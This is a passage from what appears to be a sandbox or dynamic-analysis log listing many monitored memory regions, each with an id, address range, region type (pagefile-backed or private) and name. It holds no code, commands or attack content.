"pagefile_0x0000000000530000" filename = "" Region: id = 10831 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10832 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10833 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10834 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10835 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10836 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10837 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10838 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10839 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10840 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10841 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10842 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10843 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10844 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10845 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10846 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10847 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10848 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10849 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10850 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10851 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10852 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10853 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10854 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10855 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10856 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10857 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10858 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10859 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10860 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10861 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10862 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10863 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10864 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10865 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10866 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10867 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10868 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10869 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10870 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10871 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10872 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10873 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10874 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10875 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10876 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10877 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10878 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10879 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10880 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10881 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10882 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10883 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10884 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10885 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10886 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10887 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10888 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10889 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10890 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10891 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10892 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10893 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10894 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10895 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10896 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10897 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10898 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10899 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10900 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10901 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10902 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10903 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10904 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10905 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10906 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10907 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10908 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10909 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10910 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10911 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10912 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10913 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10914 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10915 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10916 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10917 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10918 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10919 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10920 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10921 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10922 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10923 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10924 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10925 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10926 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10927 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10928 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10929 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10930 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10931 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10932 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10933 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10934 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10935 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10936 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10937 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10938 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10939 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10940 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10941 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10942 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10943 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10944 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10945 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10946 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10947 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10948 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10949 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10950 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10951 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10952 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10953 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10954 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10955 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10956 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10957 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10958 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10959 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10960 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10961 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10962 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10963 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10964 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10965 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10966 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10967 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10968 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10969 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10970 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10971 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10972 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10973 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10974 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10975 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10976 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10977 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10978 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10979 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10980 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10981 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10982 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10983 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10984 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10985 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10986 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10987 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10988 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10989 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10990 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10991 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10992 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10993 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10994 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10995 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10996 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10997 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10998 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10999 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11000 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11001 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11002 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11003 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11004 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11005 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11006 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11007 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11008 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11009 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11010 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11011 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11012 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11013 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11014 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11015 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11016 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11017 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11018 start_va = 0x530000 end_va = 0x53dfff 